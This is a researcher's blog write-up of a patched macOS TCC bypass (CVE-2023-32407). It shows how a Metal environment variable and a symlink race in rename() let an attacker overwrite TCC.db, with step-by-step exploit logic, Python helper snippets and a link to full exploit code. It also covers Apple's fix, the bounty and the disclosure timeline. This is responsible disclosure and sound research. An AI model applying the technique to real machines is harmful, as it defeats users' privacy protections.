lateralus (CVE-2023-32407) - a macOS TCC bypass

Posted on 2023-11-14 in blog

Since I owe you guys a bunch of writeups from my talk (Unexpected, Unreasonable, Unfixable: Filesystem Attacks on macOS), I decided to tackle lateralus today.

It's a simple, clean bug with a quick and satisfying resolution. I have been bitching about Apple in past blog posts (and on twitter), so it feels good to give them credit where credit is due.

Background

I found this bug using the automation framework I wrote last year. Building it took a bit of time, but it was worth it, since with it I could:

select targets based on entitlements and library dependencies
run them over SSH in a dtrace harness (with SIP off)

The idea

My idea was the following: Do dumb analysis, but do it at scale.

Since by now I knew that macOS is absolutely massive and I knew for a fact that weird things can happen - like Music having FDA - I thought it was likely that obvious, easy bugs simply went unnoticed.

To test my theory, I picked a list of all FDA entitled apps on macOS and I had my dtracer run them one by one, while tracking the system calls and certain libc calls.

When I analysed this dataset, I grepped for getenv and to make things simpler, I also grepped for FILE, DIR, OUTPUT, LOG and the like.

To my surprise I got a few hits, which I could track down using my dtracer's backtrace functionality, which does exactly what you think it does.

This post is about one of these that stood out.
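
The grep step described above could look roughly like the sketch below. The log format (tab-separated binary, call name, first argument) and the sample lines are assumptions made up for illustration; the real output of the dtrace harness is not shown in this post.

```python
import re

# Keywords hinting that an environment variable carries a file path.
KEYWORDS = re.compile(r"FILE|DIR|OUTPUT|LOG")


def interesting_getenv_calls(lines):
    """Yield (binary, variable) for getenv() calls with file-like variable names.

    Assumes a hypothetical tab-separated log: binary, call name, first argument.
    """
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 3:
            continue  # skip lines that do not match the assumed format
        binary, call, arg = parts
        if call == "getenv" and KEYWORDS.search(arg):
            yield binary, arg


# Made-up sample data, not real trace output.
sample = [
    "Music\tgetenv\tMTL_DUMP_PIPELINES_TO_JSON_FILE",
    "Music\tgetenv\tHOME",
    "Music\topen\t/etc/passwd",
]
hits = list(interesting_getenv_calls(sample))
```

A filter this dumb produces false positives, but at this scale it only needs to shrink the dataset enough for a human to read the rest.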

The bug

The environment variable MTL_DUMP_PIPELINES_TO_JSON_FILE is quite a special variable, utilised by the Metal framework. This framework is a dependency of various programs, most notably Music, which I really like since it has FDA.

If this env var is set, it pretty much does exactly what you think it does. It will open a file as the currently running application and write some debug data into it.

The file write is triggered in Metal via a call to NSFileManager's createFileAtPath(). As the name might suggest, createFileAtPath() creates a file at the path. It will also overwrite a file if it exists, which is pretty useful.

We have a pretty nice primitive on our hands, since - as attackers - we can trigger this in any application that uses Metal, and we can also control the file name completely. We will use this to eventually wrangle full content control out of the bug, but let's not get ahead of ourselves.

What does it do?

Let's set the following: MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"

If path is a valid directory, the bug will trigger and we can use fs_usage to see what is going on in the program:

a file will be open()ed, called path/.dat.nosyncXXXX.XXXXXX (X is random)
one or more write()s will write the contents to the file (we do not control this)
path/.dat.nosyncXXXX.XXXXXX will be rename()d to path/name
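
The three steps seen in fs_usage follow the common "write a temp file, then rename it into place" pattern. Here is a minimal Python model of that pattern. It is not Foundation's implementation; the function name and the use of tempfile.mkstemp() are illustrative assumptions.

```python
import os
import tempfile


def write_then_rename(path, data):
    """Write data to a temp file next to `path`, then rename() it into place."""
    directory, _name = os.path.split(path)
    # Step 1: open() a randomly named temp file in the destination directory.
    fd, tmp_path = tempfile.mkstemp(prefix=".dat.nosync", dir=directory or ".")
    try:
        # Step 2: write() the contents.
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        # Step 3: rename() the temp file over the final name,
        # replacing an existing file if there is one.
        os.rename(tmp_path, path)
    except BaseException:
        os.unlink(tmp_path)  # do not leave the temp file behind on failure
        raise
    return path
```

Note that step 3 passes two full paths to rename(), both going through the same parent directory.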

It's a temporary file write, followed by a rename() in place. It took me a bit to figure out that this is not secure. You might have known this already, but I didn't.

rename()ing in place is NOT safe!

As it turns out, rename() does not work how I intuitively thought it would. I had no idea about this, and the only reason I know is because I spent quite a long time reading the xnu source code for a totally different reason.

You see, in order for rename(old, new) to work it has to "resolve" the paths in old and new to vnode_t kernel structures for both. Since filesystems are tricky (symlinks, hardlinks, mounts, . and .. files, firmlinks, etc...) this is not a straightforward task. Because of that, the paths old and new get resolved separately.

This is done because old can be in new, it might be a symlink, new might be a directory, they might be the same, etc... The entire rename functionality is incredibly, incredibly complicated.

For more information you can check out the xnu function renameat_internal(), but buckle up if you do. It's not for the faint of heart.

So we know that rename(old, new) will resolve the parameters old and new separately. This seems pretty logical on the surface, since if old is /etc/passwd and new is /tmp/whatever, it's quite obvious that this needs to be done.

But what about the simpler case of just renaming a file within a directory?

I incorrectly assumed that rename("./tmp/a", "./tmp/b") will employ some sort of caching, or is somehow a less dangerous operation than a rename() that uses full absolute paths. It's not.

As far as the kernel is concerned, the relative paths don't matter. Any path not starting with a "/" is considered relative, and in this case the starting "." is simply shorthand for "current working directory", or CWD for short. Technically, in the kernel this is called AT_FDCWD, but we don't need to know that.

So if our CWD is /Users/hacker/, this call is equivalent to:

rename("/Users/hacker/tmp/a", "/Users/hacker/tmp/b")

This does not look nearly as innocent now, especially since we know that the lookup will be performed twice. Why? Because this means that we can change /Users/hacker/tmp/ between the two lookups.

If we swap the tmp directory with a symlink at the right time (after the first lookup, but before the second), we can end up with an attacker controlled destination directory:

rename("/Users/hacker/tmp/a", "/PWNED/b")
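
To make the window visible without racing anything, here is a deterministic userspace model of it. This is not xnu code: it mimics the two separate lookups by opening each parent directory on its own and running a callback in between, where the attacker's swap happens. All names (modelled_rename, demo, the directory names) are made up for the sketch, and the swap here uses two plain renames because nothing runs concurrently.

```python
import os
import tempfile


def modelled_rename(old, new, between_lookups=lambda: None):
    """Model a rename() that resolves each parent directory separately."""
    old_dir, old_name = os.path.split(old)
    new_dir, new_name = os.path.split(new)
    old_fd = os.open(old_dir, os.O_RDONLY)  # lookup 1: parent of old
    try:
        between_lookups()  # the attacker's window
        new_fd = os.open(new_dir, os.O_RDONLY)  # lookup 2: follows symlinks
        try:
            os.rename(old_name, new_name,
                      src_dir_fd=old_fd, dst_dir_fd=new_fd)
        finally:
            os.close(new_fd)
    finally:
        os.close(old_fd)


def demo():
    base = tempfile.mkdtemp()
    tmp = os.path.join(base, "tmp")
    target = os.path.join(base, "PWNED")
    link = os.path.join(base, "ourlink")
    os.mkdir(tmp)
    os.mkdir(target)
    os.symlink(target, link)
    with open(os.path.join(tmp, "a"), "w") as f:
        f.write("attacker data")

    def swap():
        # Replace the real tmp directory with the symlink.
        os.rename(tmp, os.path.join(base, "tmp.real"))
        os.rename(link, tmp)

    modelled_rename(os.path.join(tmp, "a"), os.path.join(tmp, "b"), swap)
    return os.listdir(target)  # the file ends up in the symlink's target
```

Both arguments name a file under tmp/, yet the file lands in PWNED/, because the second lookup saw the symlink while the first saw the real directory.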

There is one giant caveat to this:

There has to be a subdirectory in CWD that is attacker-controlled. rename()ing a file that is the direct descendant of the CWD is a special case that can not be raced! rename("./a", "./b") is safe, but rename("./tmp/a", "./tmp/b") is not.

I have incorrectly stated previously that this was also racy, but since then I realized that that was a mistake. For more information, check the correction blogpost on this blog.

We can do the swap in any number of ways, but it's most convenient to use the renamex_np(from, to, flags) system call with the flag RENAME_SWAP. This will atomically swap from and to if the filesystem supports it, and luckily all the default macOS filesystems (APFS and HFS+) do. This is not necessary for exploitation, it's only a convenience.
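
A minimal sketch of calling renamex_np() from Python through ctypes, assuming macOS. The wrapper name swap_atomically is made up; the RENAME_SWAP value is the one defined in the macOS header sys/stdio.h. On other platforms the function simply refuses to run.

```python
import ctypes
import os
import sys

RENAME_SWAP = 0x00000002  # from <sys/stdio.h> on macOS


def swap_atomically(a, b):
    """Atomically exchange the directory entries `a` and `b` (macOS only)."""
    if sys.platform != "darwin":
        raise NotImplementedError("renamex_np() is only available on macOS")
    libc = ctypes.CDLL(None, use_errno=True)
    # int renamex_np(const char *from, const char *to, unsigned int flags);
    libc.renamex_np.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_uint]
    libc.renamex_np.restype = ctypes.c_int
    if libc.renamex_np(os.fsencode(a), os.fsencode(b), RENAME_SWAP) != 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
```

Called on a directory and a symlink, this exchanges the two names in one step, so there is never a moment when either path is missing.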

What we have now, is a fully controlled rename():

We can replace /PWNED/ with whatever we want
b originally came from our environment variable, so we can change it as well

This means that we have total control over the destination path.

The only thing that remains is controlling the contents of the source file.

Since we can redirect the rename() anywhere on the filesystem, we can simply specify a directory we own as the path to MTL_DUMP_PIPELINES_TO_JSON_FILE, with the filename set to the final destination filename.

This way:

we can catch the tempfile creation and control the contents
- or keep an open file descriptor to it
we still get to control the filename part of the destination path
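
Catching the temp file can be as simple as polling the directory we own. The sketch below is one way to do it, under stated assumptions: the function name, the polling approach and the timeout are illustrative and not taken from the published exploit. The important property is that the returned file descriptor keeps pointing at the same file after it gets renamed.

```python
import os
import time


def catch_tempfile(directory, prefix=".dat.nosync", timeout=5.0):
    """Poll `directory` until a file starting with `prefix` shows up, then
    open it for writing.

    Returns (fd, name). Raises TimeoutError if nothing appears in time.
    """
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        for name in os.listdir(directory):
            if not name.startswith(prefix):
                continue
            try:
                fd = os.open(os.path.join(directory, name), os.O_WRONLY)
            except FileNotFoundError:
                continue  # already renamed away, keep polling
            return fd, name
    raise TimeoutError("no temp file appeared")
```

Since the directory belongs to us, opening the file is allowed, and whatever we write through the descriptor later ends up in the renamed file.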

The exploit

For example, to overwrite the user's TCC.db, we can:

create /Users/hacker/ourlink to point to /Users/hacker/Library/Application Support/com.apple.TCC/
create the directory /Users/hacker/tmp/
set MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db
trigger the bug by running Music with this env var
catch the open() of /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX (X is random)
- here we also open() this file for writing, and hold on to the file descriptor
atomically switch /Users/hacker/tmp with /Users/hacker/ourlink in a loop
- we do this to maximize our chances of succeeding as the race window is pretty slim, but losing the race has negligible downside
wait a bit
test if we got lucky
- if not, run again from the top

What if we win the race?

If we got lucky, we just overwrote the user's TCC.db with a file that we have an open file descriptor to: it's game over.

What if we lose the race?

Notice that here we have two races:

race #1: catch the temp file after it's open()-ed
- this race is really easy to win
race #2: swap the directory between the old and new lookups in rename(old, new)
- this race is harder, so we use a loop

The worst that can happen is that we trash TCC.db, which is fairly inconsequential as we can just recover from it by using tccutil reset All, but that's a dirty solution. In order to avoid that, we can make the exploit a lot more robust:

We will only attempt the second race after we won the first.

Since this way we always control the new file, we can avoid overwriting TCC.db with random data.

For race #2 (rename(old, new)), we can only have 4 different outcomes:

number #1 - we don't change either:

old: /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/tmp/TCC.db

This is okay, since it's as if we did nothing.

number #2 - we change "tmp" in old but not new:

old: /Users/hacker/Library/Application Support/com.apple.TCC/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/tmp/TCC.db

This is okay, since the file referred to in old does not exist, and rename() errors out.

number #3 - we change "tmp" in new but not old:

old: /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/Library/Application Support/com.apple.TCC/TCC.db

We win, this is the scenario we want :)

number #4 - we change "tmp" in new and old:

old: /Users/hacker/Library/Application Support/com.apple.TCC/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/Library/Application Support/com.apple.TCC/TCC.db

This is okay, since the file referred to in old does not exist, and rename() errors out.

There is no situation in which we can cause serious trouble.

This means that we are safe to swap the files in a loop and retry the exploit until we succeed.
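
The four cases can also be enumerated mechanically. This is only a restatement of the reasoning above as a small Python table; the function name and the outcome strings are made up for the sketch.

```python
from itertools import product

TMP = "/Users/hacker/tmp"
TCC = "/Users/hacker/Library/Application Support/com.apple.TCC"


def outcome(old_sees_link, new_sees_link):
    """Describe what rename(old, new) does for one combination of lookups."""
    old_dir = TCC if old_sees_link else TMP
    new_dir = TCC if new_sees_link else TMP
    if old_dir == TCC:
        # The temp file only exists in our own tmp directory.
        return "rename() fails: temp file does not exist there"
    if new_dir == TCC:
        return "win: our file becomes TCC.db"
    return "no-op: file lands in our own tmp directory"


# Keys are (old_sees_link, new_sees_link).
table = {flags: outcome(*flags) for flags in product([False, True], repeat=2)}
```

Exactly one of the four combinations is a win, and none of the others touches the real TCC.db.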

This is as good as a filesystem bug can get.

Demo and code

Demo video

The full exploit code is on my github: https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal

The fix

Apple simply removed the environment variable, closing the bug for good. Apple also removed several other environment variables in Metal that had similar abuse potential. Well done!

Root causes

The root cause of the bug was fairly simple: A privileged application was relying on a complex, configurable library that in turn used an insecure file write API.

Further research

Research into bugs like this will be heavily hindered by the introduction of AMFI (see conclusion section), so I don't see a big future in researching environment variables.

With that said, it's noteworthy that the dangerous createFileAtPath function in NSFileManager was not hardened.

Apple's response time and communication

Response time: great

The fix was in the beta 42 days after reporting, which I'm very happy with. It might have been there earlier, but that was the time I saw it.

The bug was not hard to track down (or fix), so that certainly helped. I think a fix like this is pretty much a best case response time, but I'll take 42 days with any bug. Hell, I'd take 90 if I could...

Communication: great

This was a much better experience than usual:

no passive-aggressive canned-responses
my questions/comments were NOT ignored
the other person seemed invested in solving the problem
the response time was fantastic

Communication-wise this was one of the best experiences I had in the program. Sure, there was not a lot of confusion and back-and-forth needed, but - at least to me - being treated like a human (and not a robot) goes a long way.

If you are the person I talked to: Thank You!

The bounty

Apple awarded me $30,500 for this bug, which was more than fair. It's an amount I gladly accept.

Initially I saw a sliver of hope that this bug would work on iOS, but both Apple and I had to conclude that it won't. I'm okay with that.

At the time this bounty seemed like a gift: This bug needed a lot less time and effort to work out than it usually does. That was weird, but I suppose sometimes you just get lucky, and since I'm usually not, I'm happy to take it.

Conclusion

All in all, this was a really easy bug, with a pretty large bounty and a great experience hunting in Apple's ASB. If most reports went half this good, I'd be a happy man.

Presumably related to this, Apple also rolled out AMFI, which pretty much kills the environment variable vector by cutting down the attack surface significantly. It was about time and the customers will be much better for it.

It makes me happy to think that I might have contributed - however little I could - to this.

May the universe's RNG shine on your terminal in your bug hunting journey.

Timeline

2023-03-15: Report sent to Apple
2023-03-28: Given a deadline of 2023-10-09, as my talk got accepted at OBTSv6
2023-04-26: I spotted a fix in beta2, it seems solid
2023-04-26: Apple confirms that it's the fix
2023-06-08: Bug is adjudicated for $30,500
2023-06-08: I dispute the amount as it affected multiple platforms
2023-06-08: Apple apologises for the confusion and confirms that multiple platforms are affected, however the bug is deemed not exploitable on them. (fair enough)
2023-06-08: I promise to look into it
2023-06-09: I tell Apple that I will do this over the weekend, assuming I have to be quick
2023-06-10: Apple assures me that I can take as much time as I need
2023-06-11: After working over the weekend I couldn't find a good vector, as this requires env var setting, which, as far as I know, is not possible on iOS. Apple's assessment was (unsurprisingly) correct
2023-06-12: Apple thanks me one more time and we discuss payment details, etc...